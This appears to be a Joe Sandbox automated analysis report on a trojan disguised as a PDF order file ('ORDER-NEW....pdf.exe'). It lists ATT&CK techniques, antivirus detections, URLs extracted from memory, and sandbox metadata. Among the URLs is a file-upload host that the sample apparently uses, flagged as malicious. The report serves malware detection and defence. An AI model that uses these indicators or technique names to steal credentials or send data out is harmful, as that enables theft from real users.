              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts11
              Native API              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information              		2
              Credentials in Registry              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		Exfiltration Over Bluetooth1
              Remote Access Software              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts1
              Shared Modules              		Logon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information              		1
              Credentials In Files              		1
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)4
              Software Packing              		NTDS19
              System Information Discovery              		Distributed Component Object Model1
              Clipboard Data              		Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
              Virtualization/Sandbox Evasion              		LSA Secrets241
              Security Software Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common412
              Process Injection              		Cached Domain Credentials13
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Hidden Files and Directories              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Owner/User Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              Remote System Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              ORDER-NEW....pdf.exe63%VirustotalBrowse
              ORDER-NEW....pdf.exe94%ReversingLabsByteCode-MSIL.Trojan.Skeeyah
              ORDER-NEW....pdf.exe100%AviraHEUR/AGEN.1120322
              ORDER-NEW....pdf.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              5.0.AppLaunch.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
              5.0.AppLaunch.exe.400000.4.unpack100%AviraTR/Dropper.GenDownload File
              0.0.ORDER-NEW....pdf.exe.7f0000.1.unpack100%AviraHEUR/AGEN.1120322Download File
              5.0.AppLaunch.exe.400000.3.unpack100%AviraTR/Dropper.GenDownload File
              8.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1210557Download File
              0.2.ORDER-NEW....pdf.exe.7f0000.0.unpack100%AviraHEUR/AGEN.1120322Download File
              8.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1210557Download File
              8.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1210557Download File
              5.2.AppLaunch.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
              0.0.ORDER-NEW....pdf.exe.7f0000.13.unpack100%AviraHEUR/AGEN.1120322Download File
              8.0.vbc.exe.400000.5.unpack100%AviraHEUR/AGEN.1210557Download File
              8.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1210557Download File
              8.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1210557Download File
              0.0.ORDER-NEW....pdf.exe.7f0000.0.unpack100%AviraHEUR/AGEN.1120322Download File
              5.0.AppLaunch.exe.400000.2.unpack100%AviraTR/Dropper.GenDownload File
              5.0.AppLaunch.exe.400000.1.unpack100%AviraTR/Dropper.GenDownload File
              8.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1210557Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
              https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js0%URL Reputationsafe
              http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z0%Avira URL Cloudsafe
              https://a.pomf.cat/4%VirustotalBrowse
              https://a.pomf.cat/100%Avira URL Cloudphishing
              https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.js0%VirustotalBrowse
              https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.js0%Avira URL Cloudsafe
              http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
              https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b5880%Avira URL Cloudsafe
              https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css0%URL Reputationsafe
              https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370%URL Reputationsafe
              https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b50%URL Reputationsafe
              https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e0%Avira URL Cloudsafe
              http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
              https://logincdn.msauth.net/16.000.28230.00/Converged_v21033.css0%Avira URL Cloudsafe
              https://pki.goog/repository/00%URL Reputationsafe
              https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=10%URL Reputationsafe
              https://172.217.23.78/0%Avira URL Cloudsafe
              https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js0%URL Reputationsafe
              http://images.outbrainimg.com/transform/v3/eyJpdSI6IjVhZWEwOTA0MmYxYzJjMDRlMmU1NDg1YzZmNjY2NTU5N2E5N0%Avira URL Cloudsafe
              http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3Z0%Avira URL Cloudsafe
              http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
              http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
              http://pki.goog/gsr2/GTS1O1.crt0#0%URL Reputationsafe
              http://pomf.cat/upload.php&https://a.pomf.cat/0%Avira URL Cloudsafe
              http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxYWZjY2Q0NWJhMmI1MGJkMWJjMzhmMGFlZWM2MDJmMjc2O0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplatebhvF129.tmp.8.drfalse
                		high
                https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.pngbhvF129.tmp.8.drfalse
                  		high
                  https://www.google.com/chrome/static/css/main.v2.min.cssbhvF129.tmp.8.drfalse
                    		high
                    https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQvbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drfalse
                      		high
                      https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpgbhvF129.tmp.8.drfalse
                        		high
                        https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637bhvF129.tmp.8.drfalse
                          		high
                          http://www.msn.combhvF129.tmp.8.drfalse
                            		high
                            http://www.nirsoft.netvbc.exe, 00000008.00000002.715560522.000000000019C000.00000004.00000001.sdmpfalse
                              		high
                              https://deff.nelreports.net/api/report?cat=msnbhvF129.tmp.8.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://contextual.media.net/__media__/js/util/nrrV9140.jsbhvF129.tmp.8.drfalse
                                		high
                                https://www.google.com/chrome/static/images/chrome-logo.svgbhvF129.tmp.8.drfalse
                                  		high
                                  https://www.google.com/chrome/static/images/homepage/homepage_features.pngbhvF129.tmp.8.drfalse
                                    		high
                                    https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.jsbhvF129.tmp.8.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.pngbhvF129.tmp.8.drfalse
                                      		high
                                      https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.gobhvF129.tmp.8.drfalse
                                        		high
                                        https://www.google.com/complete/search?q=chr&cp=3&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=bhvF129.tmp.8.drfalse
                                          		high
                                          http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2ZbhvF129.tmp.8.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://a.pomf.cat/AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmptrue
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fbhvF129.tmp.8.drfalse
                                            		high
                                            https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.jsbhvF129.tmp.8.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1bhvF129.tmp.8.drfalse
                                              		high
                                              https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.pngbhvF129.tmp.8.drfalse
                                                		high
                                                https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowsbhvF129.tmp.8.drfalse
                                                  		high
                                                  https://maps.windows.com/windows-app-web-linkbhvF129.tmp.8.drfalse
                                                    		high
                                                    http://www.msn.com/?ocid=iehpvbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712829130.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712034300.00000000022B6000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712693489.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drfalse
                                                      		high
                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3bhvF129.tmp.8.drfalse
                                                        		high
                                                        http://crl.pki.goog/GTS1O1core.crl0bhvF129.tmp.8.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://cvision.media.net/new/286x175/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9bhvF129.tmp.8.drfalse
                                                          		high
                                                          http://www.nirsoft.net/vbc.exe, 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmpfalse
                                                            		high
                                                            https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588bhvF129.tmp.8.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.google.com/chrome/static/images/homepage/hero-anim-middle.pngbhvF129.tmp.8.drfalse
                                                              		high
                                                              https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.cssbhvF129.tmp.8.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.google.com/chrome/static/css/main.v3.min.cssbhvF129.tmp.8.drfalse
                                                                		high
                                                                https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&psbhvF129.tmp.8.drfalse
                                                                  		high
                                                                  https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937bhvF129.tmp.8.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5bhvF129.tmp.8.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&pqbhvF129.tmp.8.drfalse
                                                                    		high
                                                                    https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kbhvF129.tmp.8.drfalse
                                                                      		high
                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeebhvF129.tmp.8.drfalse
                                                                        		high
                                                                        https://www.google.com/?gws_rd=sslbhvF129.tmp.8.drfalse
                                                                          		high
                                                                          https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266ebhvF129.tmp.8.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://adservice.google.com/adsid/google/si?gadsid=AORoGNTzML9SvDOPLAOFxwn751k-3cAoAULy2FWuSRb89C_PbhvF129.tmp.8.drfalse
                                                                            		high
                                                                            https://cvision.media.net/new/100x75/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9bhvF129.tmp.8.drfalse
                                                                              		high
                                                                              https://cvision.media.net/new/300x300/2/41/100/83/b5cbfa68-1c93-41c9-8797-4f9b532bc0b6.jpg?v=9bhvF129.tmp.8.drfalse
                                                                                		high
                                                                                https://www.google.com/chrome/static/images/download-browser/pixel_phone.pngbhvF129.tmp.8.drfalse
                                                                                  		high
                                                                                  http://pki.goog/gsr2/GTS1O1.crt0bhvF129.tmp.8.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1bhvF129.tmp.8.drfalse
                                                                                    		high
                                                                                    https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlbhvF129.tmp.8.drfalse
                                                                                      		high
                                                                                      https://www.google.com/chrome/static/images/app-store-download.pngbhvF129.tmp.8.drfalse
                                                                                        		high
                                                                                        https://www.google.com/complete/search?q=ch&cp=2&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0bhvF129.tmp.8.drfalse
                                                                                          		high
                                                                                          https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.pngbhvF129.tmp.8.drfalse
                                                                                            		high
                                                                                            https://contextual.media.net/bhvF129.tmp.8.drfalse
                                                                                              		high
                                                                                              https://logincdn.msauth.net/16.000.28230.00/Converged_v21033.cssbhvF129.tmp.8.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://pki.goog/repository/0bhvF129.tmp.8.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://www.msn.com/vbc.exe, 00000008.00000003.712462189.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712423496.00000000022B7000.00000004.00000001.sdmp, bhvF129.tmp.8.drfalse
                                                                                                		high
                                                                                                https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drfalse
                                                                                                  		high
                                                                                                  https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1bhvF129.tmp.8.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/m=IvlUebhvF129.tmp.8.drfalse
                                                                                                    		high
                                                                                                    https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9bhvF129.tmp.8.drfalse
                                                                                                      		high
                                                                                                      https://www.google.com/favicon.icobhvF129.tmp.8.drfalse
                                                                                                        		high
                                                                                                        http://www.msn.com/bhvF129.tmp.8.drfalse
                                                                                                          		high
                                                                                                          https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.pngbhvF129.tmp.8.drfalse
                                                                                                            		high
                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734bhvF129.tmp.8.drfalse
                                                                                                              		high
                                                                                                              https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpgbhvF129.tmp.8.drfalse
                                                                                                                		high
                                                                                                                https://www.google.com/chrome/static/images/fallback/icon-twitter.jpgbhvF129.tmp.8.drfalse
                                                                                                                  		high
                                                                                                                  https://172.217.23.78/vbc.exe, 00000008.00000003.712859827.00000000022AF000.00000004.00000001.sdmp, bhvF129.tmp.8.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://cvision.media.net/new/100x75/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9bhvF129.tmp.8.drfalse
                                                                                                                    		high
                                                                                                                    https://www.google.com/images/nav_logo299.pngbhvF129.tmp.8.drfalse
                                                                                                                      		high
                                                                                                                      http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804bhvF129.tmp.8.drfalse
                                                                                                                        		high
                                                                                                                        https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9bhvF129.tmp.8.drfalse
                                                                                                                          		high
                                                                                                                          https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3bhvF129.tmp.8.drfalse
                                                                                                                            		high
                                                                                                                            https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.jsbhvF129.tmp.8.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjVhZWEwOTA0MmYxYzJjMDRlMmU1NDg1YzZmNjY2NTU5N2E5NbhvF129.tmp.8.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://contextual.media.net/48/nrrV18753.jsbhvF129.tmp.8.drfalse
                                                                                                                              		high
                                                                                                                              https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhvF129.tmp.8.drfalse
                                                                                                                                		high
                                                                                                                                https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&bhvF129.tmp.8.drfalse
                                                                                                                                  		high
                                                                                                                                  https://www.google.com/accounts/serviceloginvbc.exefalse
                                                                                                                                    		high
                                                                                                                                    https://consent.google.com/set?pc=s&uxe=4421591bhvF129.tmp.8.drfalse
                                                                                                                                      		high
                                                                                                                                      https://www.google.com/chrome/static/images/homepage/google-enterprise.pngbhvF129.tmp.8.drfalse
                                                                                                                                        		high
                                                                                                                                        http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3ZbhvF129.tmp.8.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://www.google.com/chrome/static/images/homepage/google-dev.pngbhvF129.tmp.8.drfalse
                                                                                                                                          		high
                                                                                                                                          https://www.google.com/chrome/static/images/thank-you/thankyou-animation.jsonbhvF129.tmp.8.drfalse
                                                                                                                                            		high
                                                                                                                                            https://www.google.com/images/hpp/Chrome_Owned_96x96.pngbhvF129.tmp.8.drfalse
                                                                                                                                              		high
                                                                                                                                              http://crl.pki.goog/gsr2/gsr2.crl0?bhvF129.tmp.8.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://srtb.msn.com/auction?a=de-ch&b=28e3747a031f4b2a8498142b7c961529&c=MSN&d=http%3A%2F%2Fwww.msnbhvF129.tmp.8.drfalse
                                                                                                                                                		high
                                                                                                                                                http://pki.goog/gsr2/GTSGIAG3.crt0)bhvF129.tmp.8.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrFbhvF129.tmp.8.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2bhvF129.tmp.8.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://policies.yahoo.com/w3c/p3p.xmlbhvF129.tmp.8.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.google.com/bhvF129.tmp.8.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.google.com/chrome/static/images/fallback/icon-fb.jpgbhvF129.tmp.8.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.google.com/images/searchbox/desktop_searchbox_sprites302_hr.pngbhvF129.tmp.8.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframesbhvF129.tmp.8.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://google.com/bhvF129.tmp.8.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_bhvF129.tmp.8.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://pki.goog/gsr2/GTS1O1.crt0#bhvF129.tmp.8.drfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://pomf.cat/upload.php&https://a.pomf.cat/ORDER-NEW....pdf.exe, 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, AppLaunch.exe, 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmptrue
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=httpsvbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxYWZjY2Q0NWJhMmI1MGJkMWJjMzhmMGFlZWM2MDJmMjc2ObhvF129.tmp.8.drfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authusbhvF129.tmp.8.drfalse
                                                                                                                                                                      		high

                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                      No contacted IP infos

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                      Analysis ID:557358
                                                                                                                                                                      Start date:21.01.2022
                                                                                                                                                                      Start time:01:09:07
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 10m 36s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Sample file name:ORDER-NEW....pdf.exe
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                      Number of analysed new started processes analysed:22
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.phis.troj.spyw.evad.winEXE@11/9@0/0
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 97.4% (good quality ratio 94.5%)
                                                                                                                                                                      • Quality average: 85.8%
                                                                                                                                                                      • Quality standard deviation: 23%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 99%
                                                                                                                                                                      • Number of executed functions: 156
                                                                                                                                                                      • Number of non-executed functions: 279
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                      Warnings

                                                                                                                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.89.179.12
